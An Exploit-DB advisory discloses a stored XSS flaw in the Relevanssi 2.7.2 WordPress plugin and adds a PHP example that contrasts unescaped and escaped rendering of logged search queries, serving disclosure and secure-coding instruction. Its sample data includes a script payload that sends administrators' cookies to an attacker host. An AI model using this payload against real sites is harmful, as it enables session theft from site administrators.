Relevanssi 2.7.2 WordPress Plugin - Stored XSS Vulnerability

ID EDB-ID:16233
Type exploitdb
Reporter Saif El-Sherei
Modified 2011-02-24T00:00:00


Relevanssi 2.7.2 Wordpress Plugin - Stored XSS Vulnerability. Webapps exploit for php platform

# Exploit Title: Relevanssi User Searches WordPress plugin Stored XSS
# Date: 20-2-2011
# Author: Saif El-Sherei
# Software Link:
# Version: Relevanssi 2.7.2, WordPress 3.0.5
# Tested on: FireFox 3.6.13, IE 8
# Vendor Response: plugin author released an update to fix this issue


Plugin description: Relevanssi replaces the standard WordPress search with a
better search engine, with lots of features and configurable options. You'll
get better results, better presentation of results - your users will thank
you. Downloaded 34,3963 times.


The "Log search queries" option must be enabled in the plugin settings. With
logging on, a stored XSS vulnerability exists because the search query string
is logged and later displayed unsanitized in the "User Searches" section of
the admin Dashboard. An unauthenticated visitor only needs to submit a search
whose query contains HTML or JavaScript; the injected markup is stored with
the log entry and executes in the browser of any administrator who views the
User Searches page.
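The following PHP is an added illustration written for this page, not Relevanssi's own code. It models the logged-query table with a constructed in-memory array (the third entry is an attacker-supplied search) and renders it two ways: the vulnerable pattern described above, where the query is concatenated into the admin markup as-is, and a hardened version that HTML-escapes the value at output time. The function and variable names are assumptions for the example; the payload is delivered through WordPress's standard search query variable (`s`), which is not a Relevanssi-specific detail.

```php
<?php
// Added example: vulnerable vs. escaped rendering of a logged search query.
// Not the plugin's code; names and data below are constructed for illustration.

// Constructed sample of what the "Log search queries" option would store.
// The third row is the attacker's search, submitted via /?s=<payload>.
$logged_queries = [
    ['query' => 'wordpress plugins', 'hits' => 12],
    ['query' => 'relevanssi settings', 'hits' => 3],
    ['query' => '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>', 'hits' => 0],
];

// Vulnerable rendering: the stored query is placed into the admin page
// markup without escaping, so any HTML in it is interpreted by the
// administrator's browser when the "User Searches" page is viewed.
function render_user_searches_vulnerable(array $rows): string {
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= "<tr><td>" . $row['query'] . "</td><td>" . $row['hits'] . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened rendering: every untrusted value is escaped at output time.
// htmlspecialchars() is used so the example runs outside WordPress; inside
// a plugin the equivalent WordPress helper is esc_html().
function render_user_searches_escaped(array $rows): string {
    $html = "<table>\n";
    foreach ($rows as $row) {
        $query = htmlspecialchars($row['query'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $hits  = (int) $row['hits'];
        $html .= "<tr><td>{$query}</td><td>{$hits}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Simple check a reviewer can run against either renderer: does raw script
// markup from the stored queries survive into the output?
function contains_raw_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

echo "--- vulnerable ---\n" . render_user_searches_vulnerable($logged_queries);
echo "--- escaped ---\n" . render_user_searches_escaped($logged_queries);

echo "vulnerable output contains raw <script>: "
    . (contains_raw_script(render_user_searches_vulnerable($logged_queries)) ? "yes" : "no") . "\n";
echo "escaped output contains raw <script>: "
    . (contains_raw_script(render_user_searches_escaped($logged_queries)) ? "yes" : "no") . "\n";
```

The point of escaping at output rather than at logging time is that the log should keep the query exactly as submitted (it is useful to see what attackers are sending), while every place that renders it into HTML applies its own context-appropriate escaping. Escaping only on input also leaves any other consumer of the log, such as a CSV export or a JSON endpoint, with data that is wrong for its context.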




Fix: update to the latest plugin version; the plugin author has released an update that addresses this issue.